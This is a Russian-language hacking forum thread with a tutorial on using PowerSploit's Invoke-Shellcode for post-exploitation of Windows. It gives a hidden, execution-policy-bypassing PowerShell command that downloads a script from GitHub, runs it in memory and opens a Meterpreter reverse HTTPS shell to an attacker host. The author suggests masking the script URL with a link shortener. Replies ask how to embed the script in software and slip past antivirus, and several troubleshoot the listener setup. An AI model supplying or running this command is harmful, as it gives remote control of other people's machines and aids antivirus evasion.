![]() |
Часть 1 Следующая частьВсе части Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних. И начнем мы пожалуй сегодня с использования скриптовPowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем) Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1 https://forum.antichat.xyz/attachmen...88adb8516d.png Для начало сходим на гитхаб по ссылке: Код: Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде Код: Код:
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1https://forum.antichat.xyz/attachments/4766699/3.png Копируем урл нашего скрипта и готовим следующую команду: Код: Код:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Forcehttps://forum.antichat.xyz/attachments/4766699/6.png Собственно говоря и все) Запускаем данную команду и к нам прилетает метерпретер сессия) Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок) Всем спасибо) Продолжения следует) Следующая часть Все части |
добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?
|
Цитата:
|
Завтра сделаю тест на детект.Сорри сегодня не успеваю)
|
я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?
|
Цитата:
|
Symantec Endpoint Protection 12 этот скрипт прибивает..
|
Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)
|
Цитата:
|
Огромное спасибо за статью, искал нечто подобное.
|
Спасибо за статью,не подкинете пару книг по powershell?
|
Цитата:
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года. Если кому то будет интересно,то конечно могу) |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
https://codeby.net/threads/vashi-programmy-na-python.58124/#post-266525 Писал для удобства. |
https://forum.antichat.xyz/attachmen...4c5d5b9378.png
Цитата:
http://NoDistribute.com/result/FkiQhHjaUrIZAsfWG C: Код:
#include |
Цитата:
|
Цитата:
|
Цитата:
Во первых - это этично Во вторых - как вы себе представляете фото и видео на камеру таких демонстраций. Интересно... Назовите причины , по которым это не будет работать на реальных устройствах. |
Спасибо, за статьи
|
Спасибо за статью!)
|
Цитата:
|
Цитата:
|
что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('[S]link removed[/S] Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?
|
Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?
|
Цитата:
|
Цитата:
|
Что то блочит тебя. Тут я уже не волшебник, чтобы угадывать.
|
Цитата:
|
Цитата:
|
Цитата:
|
я тут взял эту штукенцию и проверил не менял айпи какой был такой и оставил нажал он куда отправился в какую вселенную можно потом от этого избавиться?)
|
Цитата:
Создать из скрипта бинарный файл? Или подгрузить бинарный файл? |
Defender палит(
|
Народ, такая ситуация, при запуске команды в ps он выдаёт что проверьте синтаксис и то что invokeshellcode не найдена хотя взял весь код и скопировал. Что может быть?
|
| Время: 18:36 |